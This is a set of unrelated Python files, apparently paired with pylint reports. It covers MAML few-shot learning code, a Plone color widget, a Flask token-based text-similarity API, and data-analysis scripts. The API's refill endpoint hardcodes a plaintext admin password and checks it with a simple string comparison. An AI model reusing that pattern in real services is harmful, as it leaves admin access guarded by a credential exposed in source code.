54 print(f"Final: TLoss {np.mean(buffer)}-{np.std(buffer)}, VLoss {np.mean(lossesB,axis=0)}-{np.std(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}-{np.std(temp_yp,axis=0)}" )
55
| 46 - warning: bad-indentation
5 - refactor: too-many-arguments
5 - refactor: too-many-positional-arguments
5 - refactor: too-many-locals
20 - warning: unused-variable
3 - warning: unused-import
3 - warning: unused-import
3 - warning: unused-import
|
1 ## Created by Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen
5 from archs.fcn import Model as mfcn
6 from archs.hydra import Model as mhyd
7 from train import *
8 from test import *
9 from args import argument_parser, train_kwargs, test_kwargs
10 import random
11
12 args = argument_parser().parse_args()
13 random.seed(args.seed)
14 t_args = train_kwargs(args)
15 e_args = test_kwargs (args)
16
17 print("########## argument sheet ########################################")
18 for arg in vars(args):
19 print (f"#{arg:>15} : {str(getattr(args, arg))} ")
20 print("##################################################################")
21
22 print("Loading Data...")
23 if args.dataset in ["Omniglot", "omniglot", "Omni", "omni"]:
24 loader = OmniChar_Gen (args.data_path)
25 isMIN = False
26 shaper = [28,28,1]
27 elif args.dataset in ["miniimagenet", "MiniImageNet", "mini"]:
28 loader = MiniImgNet_Gen(args.data_path)
29 isMIN = True
30 shaper = [84,84,3]
31 else:
32 raise ValueError("INVALID DATA-SET NAME!")
33
34 print("Building Model...")
35 if args.arch == "fcn"or args.arch == "maml":
36 print("SELECTED: MAML")
37 m = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
38 mt = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
39 #elif args.arch == "rnn":
40 # m = mrnn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.min_classes)
41 elif args.arch == "hydra" or args.arch == "hidra":
42 print("SELECTED: HIDRA")
43 m = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
44 mt = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
45 else:
46 raise ValueError("INVALID Architecture NAME!")
47
48 mode = "train"
49 if args.test:
50 mode = "test"
51 print("Starting Test Step...")
52 mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode=mode)
53 test (mt, loader, **e_args)
54 else:
55 modeltest = None
56 if args.testintrain:
57 mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode="test")
58 modeltest = mt
59 print("Starting Train Step...")
60 m.build (K = args.train_inner_K, meta_batchsz = args.meta_batch, mode=mode)
61 train(m, modeltest, loader, **t_args)
| 7 - warning: wildcard-import
8 - warning: wildcard-import
35 - refactor: consider-using-in
41 - refactor: consider-using-in
53 - error: undefined-variable
61 - error: undefined-variable
4 - warning: unused-import
|
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 import os
5 import numpy as np
6 import tensorflow as tf
7
8 class MAML:
9 def __init__(self,train_lr,meta_lr,image_shape, isMIN, label_size=2):
10 self.train_lr = train_lr
11 self.meta_lr = meta_lr
12 self.image_shape = image_shape
13 self.isMIN = isMIN
14 self.saver = None
15 self.label_size = label_size
16 self.finals = 64
17 self.maml_n = 1
18 if isMIN:
19 self.finals = 800
20 def build(self, K, meta_batchsz, mode='train'):
21
22 # Meta batch of tasks
23 self.train_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]])
24 self.train_yb = tf.placeholder(tf.float32, [None,None,None])
25 self.val_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]])
26 self.val_yb = tf.placeholder(tf.float32, [None,None,None])
27 self.label_n = tf.placeholder(tf.int32 , 1, name="num_labs")
28 #Initialize weights
29 self.weights, self.cells = self.dense_weights()
30 training = True if mode == 'train' else False
31
32 # Handle one task update
33 def meta_task(inputs):
34 train_x, train_y, val_x, val_y = inputs
35 val_preds, val_losses = [], []
36
37 train_pred = self.forward(train_x, self.weights, training)
38 train_loss = tf.losses.softmax_cross_entropy(train_y,train_pred)
39
40 grads = tf.gradients(train_loss, list(self.weights.values()))
41 gvs = dict(zip(self.weights.keys(), grads))
42
43 a=[self.weights[key] - self.train_lr * gvs[key] for key in self.weights.keys()]
44 # for key in self.weights.keys():
45 # print(key, gvs[key])
46 fast_weights = dict(zip(self.weights.keys(),a))
47
48 # Validation after each update
49 val_pred = self.forward(val_x, fast_weights, training)
50 val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred)
51 # record T0 pred and loss for meta-test
52 val_preds.append(val_pred)
53 val_losses.append(val_loss)
54
55 # continue to build T1-TK steps graph
56 for _ in range(1, K):
57
58 # Update weights on train data of task t
59 loss = tf.losses.softmax_cross_entropy(train_y,self.forward(train_x, fast_weights, training))
60 grads = tf.gradients(loss, list(fast_weights.values()))
61 gvs = dict(zip(fast_weights.keys(), grads))
62 fast_weights = dict(zip(fast_weights.keys(), [fast_weights[key] - self.train_lr * gvs[key] for key in fast_weights.keys()]))
63
64 # Evaluate validation data of task t
65 val_pred = self.forward(val_x, fast_weights, training)
66 val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred)
67 val_preds.append(val_pred)
68 val_losses.append(val_loss)
69
70 result = [train_pred, train_loss, val_preds, val_losses]
71
72 return result
73
74 out_dtype = [tf.float32, tf.float32,[tf.float32] * K, [tf.float32] * K]
75 result = tf.map_fn(meta_task, elems=(self.train_xb, self.train_yb, self.val_xb, self.val_yb),
76 dtype=out_dtype, parallel_iterations=meta_batchsz, name='map_fn')
77 train_pred_tasks, train_loss_tasks, val_preds_tasks, val_losses_tasks = result
78
79 if mode is 'train':
80 self.train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz
81 self.val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)]
82 self.val_predictions = val_preds_tasks
83
84 optimizer = tf.train.AdamOptimizer(self.meta_lr, name='meta_optim')
85 gvs = optimizer.compute_gradients(self.val_losses[-1])
86 gvs = [(tf.clip_by_norm(grad, 10), var) for grad, var in gvs]
87 self.meta_op = optimizer.apply_gradients(gvs)
88
89 else:
90 self.test_train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz
91 self.test_val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)]
92 self.val_predictions = val_preds_tasks
93
94 self.saving_weights = tf.trainable_variables()
95 def conv_layer(self, x, W, b, name, strides=1):
96 with tf.variable_scope(name,reuse=tf.AUTO_REUSE):
97 x = tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')
98 x = tf.nn.bias_add(x, b)
99 return x
100
101 def fc_layer(self,x, name, weights=None, biases=None):
102 with tf.variable_scope(name,reuse=tf.AUTO_REUSE):
103 fc = tf.matmul(x, weights)
104 fc = tf.nn.bias_add(fc, biases)
105 return fc
106
107 def loadWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'):
108 if self.saver == None:
109 z = self.saving_weights
110 #print("KEYS:", z.keys())
111 self.saver = tf.train.Saver(var_list=z, max_to_keep=12)
112 saver = self.saver
113 checkpoint_path = modeldir + f"{name}/"+model_name +"-" + step
114 if os.path.isfile(checkpoint_path+".marker"):
115 saver.restore(sess, checkpoint_path)
116 print('The checkpoint has been loaded.')
117 else:
118 print(checkpoint_path+".marker not found. Starting from scratch.")
119
120 def saveWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'):
121 if self.saver == None:
122 z = self.saving_weights
123 self.saver = tf.train.Saver(var_list=z, max_to_keep=12)
124 saver = self.saver
125 checkpoint_path = modeldir + f"{name}/"+model_name
126 if not os.path.exists(modeldir):
127 os.makedirs(modeldir)
128 saver.save(sess, checkpoint_path, global_step=step)
129 print('The checkpoint has been created.')
130 open(checkpoint_path+"-"+str(int(step))+".marker", 'a').close()
131
132
133 def dense_weights(self):
134 return
135 def forward(self,x,weights, training):
136 return | 103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
8 - refactor: too-many-instance-attributes
9 - refactor: too-many-arguments
9 - refactor: too-many-positional-arguments
20 - refactor: too-many-locals
29 - error: assignment-from-none
29 - error: unpacking-non-sequence
30 - refactor: simplifiable-if-expression
30 - refactor: literal-comparison
33 - refactor: too-many-locals
37 - error: assignment-from-none
49 - error: assignment-from-none
65 - error: assignment-from-none
79 - refactor: literal-comparison
77 - warning: unused-variable
80 - warning: unused-variable
81 - warning: unused-variable
95 - refactor: too-many-arguments
95 - refactor: too-many-positional-arguments
95 - warning: unused-argument
107 - refactor: too-many-arguments
107 - refactor: too-many-positional-arguments
120 - refactor: too-many-arguments
120 - refactor: too-many-positional-arguments
130 - refactor: consider-using-with
130 - warning: unspecified-encoding
135 - warning: unused-argument
135 - warning: unused-argument
135 - warning: unused-argument
23 - warning: attribute-defined-outside-init
24 - warning: attribute-defined-outside-init
25 - warning: attribute-defined-outside-init
26 - warning: attribute-defined-outside-init
27 - warning: attribute-defined-outside-init
29 - warning: attribute-defined-outside-init
29 - warning: attribute-defined-outside-init
80 - warning: attribute-defined-outside-init
81 - warning: attribute-defined-outside-init
82 - warning: attribute-defined-outside-init
92 - warning: attribute-defined-outside-init
87 - warning: attribute-defined-outside-init
90 - warning: attribute-defined-outside-init
91 - warning: attribute-defined-outside-init
94 - warning: attribute-defined-outside-init
5 - warning: unused-import
|
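
The meta_task closure in the record above builds MAML's inner loop: K gradient steps on the support loss produce task-specific "fast weights" (w' = w - train_lr * grad), which are then scored on the query data; the outer Adam step on val_losses[-1] differentiates that query loss back to the original weights. A minimal NumPy sketch of just the inner-loop update, with an illustrative quadratic loss standing in for the record's softmax cross-entropy (inner_loop and grad_fn are names invented for this sketch):

import numpy as np

def inner_loop(weights, grad_fn, support, train_lr, K):
    # K SGD steps on the support loss, mirroring fast_weights = weights - train_lr * grads
    fast_weights = dict(weights)
    for _ in range(K):
        grads = grad_fn(fast_weights, support)
        fast_weights = {k: fast_weights[k] - train_lr * grads[k] for k in fast_weights}
    return fast_weights

def grad_fn(ws, support):
    # Gradient of the toy loss 0.5 * mean((w*x - y)^2) with respect to w
    x, y = support
    return {"w": np.mean((ws["w"] * x - y) * x)}

support = (np.array([1.0, 2.0]), np.array([3.0, 6.0]))  # toy task: y = 3x
fast = inner_loop({"w": np.array(0.0)}, grad_fn, support, train_lr=0.4, K=5)
print(fast["w"])  # converges to 3.0, the task-specific solution
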
1 import numpy as np
2 import tensorflow as tf
3 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen
4 import time
5
6 def train( m, mt, # m is the model for training, mt is the model for testing
7 data_sampler, # Creates the data generator for training and testing
8 min_classes, # minimum amount of classes
9 max_classes, # maximum || || ||
10 train_shots, # number of samples per class (train)
11 test_shots, # number of samples per class (test)
12 meta_batch, # Number of tasks
13 meta_iters, # Number of iterations
14 test_iters, # Iterations in Test
15 train_step,
16 name): # Experiment name for experiments
17
18 sess = tf.Session()
19 sess.run(tf.global_variables_initializer())
20 # bnorms = [v for v in tf.global_variables() if "bn" in v.name]
21 #---------Performance Tracking lists---------------------------------------
22 losses = []
23 temp_yp = []
24 temp_ypn= []
25 nls = []
26 aps = []
27 buffer = []
28 lossesB = []
29 #--------------------------------------------------------------------------
30
31 #---------Load train and test data-sets------------------------------------
32 train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"train")
33 if mt is not None:
34 test_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test" )
35 m.loadWeights(sess, name, step=str(int(train_step)), model_name=name+".ckpt")
36 #--------------------------------------------------------------------------
37
38 #TRAIN LOOP
39 print("Starting meta training:")
40 start = time.time()
41 for i in range(meta_iters):
42
43 xb1,yb1,xb2,yb2 = next(train_gen)
44 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))]
45
46 if m.maml_n == 2: # in case it uses hydra master node, it should re-assign the output nodes from the master
47 sess.run(m.init_assign, feed_dict={m.label_n:[5]})
48 l,_,vals,ps=sess.run([m.train_loss,m.meta_op,m.val_losses,m.val_predictions],feed_dict={m.train_xb: xb1,
49 m.train_yb: yb1,
50 m.val_xb:xb2,
51 m.val_yb:yb2,
52 m.label_n:num_l})
53 if m.maml_n == 2: # in case it uses hydra master node, it should update the master
54 sess.run(m.final_assign,feed_dict={m.label_n:num_l})
55
56 losses.append(vals)
57 lossesB.append(vals)
58 buffer.append(l)
59
60         #Calculate accuracies
61 aux = []
62 tmp_pred = np.argmax(np.reshape(ps[-1],[-1,num_l[0]]),axis=-1)
63 tmp_true = np.argmax(np.reshape(yb2,[-1,num_l[0]]),axis=-1)
64 for ccci in range(num_l[0]):
65 tmp_idx = np.where(tmp_true==ccci)[0]
66 #print(tmp_idx)
67 aux.append(np.mean(tmp_pred[tmp_idx]==tmp_true[tmp_idx]))
68 temp_yp.append(np.mean(tmp_pred==tmp_true))
69 temp_ypn.append(aux)
70
71 #EVALUATE and PRINT
72 if i%100==0:
73 testString = ""
74 #If we give a test model, it will test using the weights from train
75 if mt is not None and i%1000==0:
76 lossestest = []
77 buffertest = []
78 lossesBtest = []
79 temp_yptest = []
80 for z in range(100):
81 if m.maml_n == 2:
82 sess.run(mt.init_assign, feed_dict={mt.label_n:[5]})
83 xb1,yb1,xb2,yb2 = next(test_gen)
84 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))]
85 l,vals,ps=sess.run([mt.test_train_loss,mt.test_val_losses,mt.val_predictions],feed_dict={mt.train_xb: xb1,
86 mt.train_yb: yb1,
87 mt.val_xb:xb2,
88 mt.val_yb:yb2,
89 mt.label_n:num_l})
90 lossestest.append(vals)
91 lossesBtest.append(vals)
92 buffertest.append(l)
93 temp_yptest.append(np.mean(np.argmax(ps[-1],axis=-1)==np.argmax(yb2,axis=-1)))
94
95 testString = f"\n TEST: TLoss {np.mean(buffertest):.3f} VLoss {np.mean(lossesBtest,axis=0)[-1]:.3f}, ACCURACY {np.mean(temp_yptest):.4f}"
96 print(f"Epoch {i}: TLoss {np.mean(buffer):.4f}, VLoss {np.mean(lossesB,axis=0)[-1]:.4f},",
97 f"Accuracy {np.mean(temp_yp):.4}", f", Per label acc: {[float('%.4f' % elem) for elem in aux]}", f"Finished in {time.time()-start}s",testString)
98
99 buffer = []
100 lossesB = []
101 temp_yp = []
102 start = time.time()
103 # f"\n TRUE: {yb2}\n PRED: {ps}")
104 if i%5000==0:
105 print("Saving...")
106 m.saveWeights(sess, name, i, model_name=name+".ckpt")
107
108 m.saveWeights(sess, name, i, model_name=name+".ckpt")
| 6 - refactor: too-many-arguments
6 - refactor: too-many-positional-arguments
6 - refactor: too-many-locals
83 - error: possibly-used-before-assignment
6 - refactor: too-many-statements
14 - warning: unused-argument
25 - warning: unused-variable
26 - warning: unused-variable
80 - warning: unused-variable
3 - warning: unused-import
3 - warning: unused-import
3 - warning: unused-import
|
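
The accuracy bookkeeping inside the training loop above (tmp_pred/tmp_true and the per-label aux list) masks predictions by each true class before averaging. A standalone sketch of that computation on toy arrays:

import numpy as np

tmp_true = np.array([0, 1, 2, 2, 2, 1])   # flattened true class indices
tmp_pred = np.array([0, 1, 1, 2, 2, 0])   # flattened predicted class indices

print(np.mean(tmp_pred == tmp_true))       # overall accuracy: 4/6
for c in np.unique(tmp_true):
    idx = np.where(tmp_true == c)[0]       # positions belonging to class c
    print(c, np.mean(tmp_pred[idx] == tmp_true[idx]))  # per-class accuracy
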
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 import numpy as np
5 import tensorflow as tf
6 from archs.maml2 import MAML
7 def getBin(l=10):
8 x_ = 2
9 n = 1
10 while x_ < l:
11 x_ = x_* 2
12 n += 1
13
14 numbers = []
15 for i in range(l):
16 num = []
17 for j in list('{0:0b}'.format(i+1).zfill(n)):
18 num.append(int(j))
19 numbers.append(num)
20 return numbers
21 class Model(MAML):
22 def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2):
23 super().__init__(train_lr,meta_lr,image_shape,isMIN, label_size)
24 self.finals = 64
25 if isMIN:
26 self.finals = 800
27 def getBin(self, l=10):
28 x_ = 2
29 n = 1
30 while x_ < l:
31 x_ = x_* 2
32 n += 1
33
34 numbers = []
35 for i in range(l):
36 num = []
37 for j in list('{0:0b}'.format(i+1).zfill(n)):
38 num.append(int(j))
39 numbers.append(num)
40 return numbers
41
42 def dense_weights(self):
43 weights = {}
44 cells = {}
45 initializer = tf.contrib.layers.xavier_initializer()
46 divider = 1
47 inic = 1
48 filters = 64
49 self.finals = 64
50 if self.isMIN:
51 print("\n\n\n\n\n\n\n\n\nIS MIN\n\n\n\n\n\n\n\n\n\n\n")
52 divider = 2
53 inic = 3
54 self.finals = 800
55 filters = 32
56 with tf.variable_scope('MASTER', reuse= tf.AUTO_REUSE):
57 cells['d_1'] = tf.get_variable('MASTER_d_1w', [self.finals,1], initializer = initializer)
58 cells['b_1'] = tf.get_variable('MASTER_d_1b', [1], initializer=tf.initializers.constant)
59 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE):
60 weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer)
61 weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer)
62 weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer)
63 weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer)
64 weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant)
65 weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant)
66 weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant)
67 weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant)
68 for i in range (self.max_labels):
69 weights['d_1w'+str(i)] = tf.get_variable('d_1w'+str(i), [self.finals,1], initializer = initializer)
70 weights['b_1w'+str(i)] = tf.get_variable('d_1b'+str(i), [1], initializer=tf.initializers.constant)
71
72
73 return weights, cells
74
75 def forward(self,x,weights, training):
76 # with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE):
77 conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1")
78 conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE)
79 conv1 = tf.nn.relu(conv1)
80 conv1 = tf.layers.MaxPooling2D(2,2)(conv1)
81
82 conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2")
83 conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE)
84 conv2 = tf.nn.relu(conv2)
85 conv2 = tf.layers.MaxPooling2D(2,2)(conv2)
86
87 conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3")
88 conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE)
89 conv3 = tf.nn.relu(conv3)
90 conv3 = tf.layers.MaxPooling2D(2,2)(conv3)
91
92 conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4")
93 conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE)
94 conv4 = tf.nn.relu(conv4)
95 conv4 = tf.layers.MaxPooling2D(2,2)(conv4)
96
97 bn = tf.layers.Flatten()(conv4)
98
99 agg = [self.fc_layer(bn,"dense"+str(i),weights["d_1w"+str(i)],weights["b_1w"+str(i)]) for i in range(self.max_labels)]
100 fc1 = tf.concat(agg, axis=-1)[:,:self.label_n[0]]
101
102 return fc1 | 22 - refactor: too-many-arguments
22 - refactor: too-many-positional-arguments
46 - warning: unused-variable
75 - warning: unused-argument
4 - warning: unused-import
|
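
The forward pass in the record above implements the "hydra" output: one single-unit dense head per possible label (d_1w0 ... d_1wN), concatenated along the class axis and then sliced down to the number of labels the current task actually uses (label_n). A NumPy sketch of that pattern, with random weights standing in for the learned d_1w*/b_1w* variables:

import numpy as np

rng = np.random.default_rng(0)
batch, features, max_labels, active_labels = 8, 64, 10, 5

x = rng.normal(size=(batch, features))                        # flattened conv features
heads = [(rng.normal(size=(features, 1)), np.zeros(1)) for _ in range(max_labels)]

# One 1-unit head per possible label, concatenated along the class axis...
logits = np.concatenate([x @ w + b for w, b in heads], axis=-1)
# ...then cut down to the labels the current task actually uses
logits = logits[:, :active_labels]
print(logits.shape)  # (8, 5)
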
1 from Products.Archetypes.public import StringWidget
2 from Products.Archetypes.Registry import registerWidget
3
4 class ColorWidget(StringWidget):
5 _properties = StringWidget._properties.copy()
6 _properties.update({
7 'macro' : "colorchooser",
8 })
9
10
11 registerWidget(ColorWidget,
12 title='Color',
13 description='Like StringWidget, stores the hex value of a color.',
14 used_for=('Products.Archetypes.Field.StringField',)
15 )
16
17
18 from Products.validation import validation
19 from Products.validation.validators import RegexValidator
20 validation.register(RegexValidator('isHexColor', r'^[0-9a-fA-F]{6}$', title='', description='',
21 errmsg='is not a hexadecimal color code.'))
22
| 4 - refactor: too-few-public-methods
|
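
The isHexColor validator registered above accepts exactly six hexadecimal digits and nothing else (no leading '#', no three-digit shorthand). A quick standalone check of the same pattern with plain re, independent of Products.validation:

import re

is_hex_color = re.compile(r'^[0-9a-fA-F]{6}$')

print(bool(is_hex_color.match('1A2B3C')))   # True
print(bool(is_hex_color.match('#1A2B3C')))  # False: the widget stores the value without '#'
print(bool(is_hex_color.match('FFF')))      # False: three-digit shorthand is rejected
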
1 # importing libraries
2 from sys_utils import *
3
4 # Resource refill
5 """
6 Resource Refill takes input on a POST protocol and adds to the existing tokens
7 Parameters:
8 namepassref: contains username, admin password and refill amount <JSON>
9 Returns:
10 retJson: contains status code and message <JSON>
11 """
12 class Refill(Resource):
13 def post(self):
14 namepassref = request.get_json()
15 username = namepassref["username"]
16 admin_password = namepassref["admin_password"]
17 refill_amt = namepassref["refill_amt"]
18
19 if not userExists(username):
20 retJson = {
21 "statuscode" : 301,
22             "message" : "User does not exist"
23 }
24 return jsonify(retJson)
25
26 correct_admin_password = "Admiral123"
27
28 if not correct_admin_password == admin_password:
29 retJson = {
30 "statuscode" : 304,
31 "message" : "Invalid admin password"
32 }
33 return jsonify(retJson)
34
35 num_tokens = countTokens(username)
36
37 users.update({
38 "username":username,
39 },
40 {
41 "$set": {
42 "tokens" : num_tokens + refill_amt
43 }
44 }
45 )
46
47 retJson = {
48 "statuscode" : 200,
49 "message" : "Tokens refilled successfully"
50 }
51 return jsonify(retJson)
| 2 - warning: wildcard-import
5 - warning: pointless-string-statement
12 - error: undefined-variable
14 - error: undefined-variable
19 - error: undefined-variable
24 - error: undefined-variable
33 - error: undefined-variable
35 - error: undefined-variable
37 - error: undefined-variable
51 - error: undefined-variable
12 - refactor: too-few-public-methods
|
1 # importing libraries
2 from sys_utils import *
3
4 # Resource Detect
5 """
6 Resource Detect takes input on a POST protocol and returns similarity ratio
7 Parameters:
8 namepassimg: contains username, password of the user and two string documents <JSON>
9 Returns:
10 retJson: contains status code and message <JSON>
11 """
12 class Detect(Resource):
13 def post(self):
14 namepasstext = request.get_json()
15 username = namepasstext["username"]
16 password = namepasstext["password"]
17 text1 = namepasstext["text1"]
18 text2 = namepasstext["text2"]
19
20 if not userExists(username):
21 retJson = {
22 "statuscode" : 301,
23             "message" : "User does not exist"
24 }
25 return jsonify(retJson)
26
27 correct_pw = verifypw(username, password)
28 if not correct_pw:
29 retJson = {
30 "statuscode" : 302,
31 "message" : "Invalid password"
32 }
33 return jsonify(retJson)
34
35 num_tokens = countTokens(username)
36 if num_tokens <= 0 :
37 retJson = {
38 "statuscode" : 303,
39 "message" : "Out of tokens, please refill"
40 }
41 return jsonify(retJson)
42
43         # calculate the similarity: we use the pretrained spaCy model to predict the similarity of the two strings given to us
44 nlp = spacy.load('en_core_web_sm') # loaded the spacy model
45
46 text1 = nlp(text1) # change from string to natural language processing model sentence
47 text2 = nlp(text2)
48
49 # ratio of similarity between 0 and 1 for the text1 and text2. closer the one, more the similarity
50 # 0 = text1 and text2 are very different and 1 = text1 and text2 are almost or entirely similar
51
52 ratio = text1.similarity(text2)
53
54 retJson = {
55 "statuscode" : 200,
56             "message" : "Similarity ratio calculated",
57 "similarity ratio" : ratio
58 }
59
60 users.update({
61 "username":username,
62 },
63 {
64 "$set": {
65 "tokens" : num_tokens -1
66 }
67 }
68 )
69 return jsonify(retJson)
| 2 - warning: wildcard-import
5 - warning: pointless-string-statement
12 - error: undefined-variable
14 - error: undefined-variable
20 - error: undefined-variable
25 - error: undefined-variable
27 - error: undefined-variable
33 - error: undefined-variable
35 - error: undefined-variable
41 - error: undefined-variable
44 - error: undefined-variable
60 - error: undefined-variable
69 - error: undefined-variable
12 - refactor: too-few-public-methods
|
1 # importing libraries
2 from sys_utils import *
3
4 # Resource Register
5 """
6 Resource Register takes input on a POST protocol and creates new accounts
7 Parameters:
8 namepass: contains username and password of the user <JSON>
9 Returns:
10 retJson: contains status code and message <JSON>
11 """
12 class Register(Resource):
13 def post(self):
14 namepass = request.get_json()
15 username = namepass["username"]
16 password = namepass["password"]
17
18 # check if the user already exists
19 if userExists(username):
20 retJson = {
21 "statuscode" : 301,
22 "message" : "User Already exists"
23 }
24 return jsonify(retJson)
25
26 hashedpw = bcrypt.hashpw(password.encode('utf8'), bcrypt.gensalt())
27 users.insert({
28 "username" : username,
29 "password" : hashedpw,
30 "tokens" : 6
31 })
32 retJson = {
33 "statuscode" : 200,
34             "message" : "you successfully signed up for the api"
35 }
36 return jsonify(retJson)
| 2 - warning: wildcard-import
5 - warning: pointless-string-statement
12 - error: undefined-variable
14 - error: undefined-variable
19 - error: undefined-variable
24 - error: undefined-variable
26 - error: undefined-variable
26 - error: undefined-variable
27 - error: undefined-variable
36 - error: undefined-variable
12 - refactor: too-few-public-methods
|
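
The three resources above share the same contract: a JSON body in, a JSON {statuscode, message} reply out. A hypothetical client call against the Register endpoint; the host, port and /register route are assumptions, only the request and response shapes follow the docstrings:

import requests

resp = requests.post(
    "http://localhost:5000/register",                 # assumed host/port/route
    json={"username": "alice", "password": "secret"},
    timeout=5,
)
print(resp.status_code)  # HTTP status (the API also returns its own "statuscode" field)
print(resp.json())       # e.g. {"statuscode": 200, "message": "you successfully signed up for the api"}
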
1 import pandas as pd
2 import numpy as np
3 from mpl_toolkits.mplot3d import Axes3D
4 import matplotlib.pyplot as plt
5 from matplotlib import cm
6
7
8 def univariant(df, param, quantity='mean_test_score'):
9 unique = df[param].unique()
10 scores = []
11 for i in unique:
12 scores.append(df[df[param] == i][quantity].mean())
13
14 plt.plot(unique, scores)
15 plt.show()
16
17
18 def multivariant(df, param1, param2,quantity='mean_test_score'):
19 unique1 = df[param1].unique()
20 unique2 = df[param2].unique()
21 unique1, unique2 = np.meshgrid(unique1, unique2)
22 scores = np.zeros(unique1.shape)
23
24 for i, p1 in enumerate(unique1[0]):
25 for j, p2 in enumerate(unique2[0]):
26 scores[i, j] = df[(df[param1] == p1) & (df[param2] == p2)][quantity].values.mean()
27
28 fig = plt.figure()
29 ax = fig.gca(projection='3d')
30
31 surf = ax.plot_surface(unique1, unique2, scores, cmap=cm.coolwarm, linewidth=0, antialiased=False)
32 ax.set_xlabel(param1)
33 ax.set_ylabel(param2)
34 ax.set_zlabel("Accuracy")
35 plt.show()
36
37
38 df = pd.read_csv("..\\results\\cnn.csv")
39 univariant(df, param='param_cnn__len_filter',quantity='mean_score_time') | 8 - warning: redefined-outer-name
18 - warning: redefined-outer-name
31 - warning: unused-variable
3 - warning: unused-import
|
1 from alpaca import Alpaca
2 from utils import to_time_series_dataset, split_df, TimeSeriesResampler, confusion_matrix
3 from sklearn.model_selection import train_test_split
4 from sklearn.utils import shuffle
5 from sklearn.pipeline import Pipeline
6 import time
7 import numpy as np
8 import pandas as pd
9
10 # Variables
11 repetitions = 2
12
13 if __name__ == "__main__":
14
15 # For both datasets
16 for dataset in ['uc1']:
17 print("Dataset: ", dataset)
18
19 results = []
20 #timing = []
21 #outliers = []
22
23 if dataset == 'uc1':
24 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'),
25 index_column='run_id',
26 feature_columns=['fldPosition', 'fldCurrent'],
27 target_name='target')
28 # Length of timeseries for resampler and cnn
29 sz = [38,41]
30 # Number of channels for cnn
31 num_channels = len(X[0][0])
32 # Number of classes for cnn
33 num_classes = np.unique(y).shape[0]
34
35 elif dataset == 'uc2':
36 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'),
37 index_column='run_id',
38 feature_columns=['position', 'force'],
39 target_name='label')
40 # Length of timeseries for resampler and cnn
41 sz = [200]
42 # Number of channels for cnn
43 num_channels = len(X[0][0])
44 # Number of classes for cnn
45 num_classes = np.unique(y).shape[0]
46
47 # For each repetition
48 for r in range(repetitions):
49 print("Repetition #", r)
50 # For each resampling length
51 for s in sz:
52 print("Resampling size:", s)
53 t_start = time.time()
54 # Shuffle for Keras
55 X, y = shuffle(X, y, random_state=r)
56 # Turn y to numpy array
57 y = np.array(y)
58 # Split into train and test sets
59 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r)
60
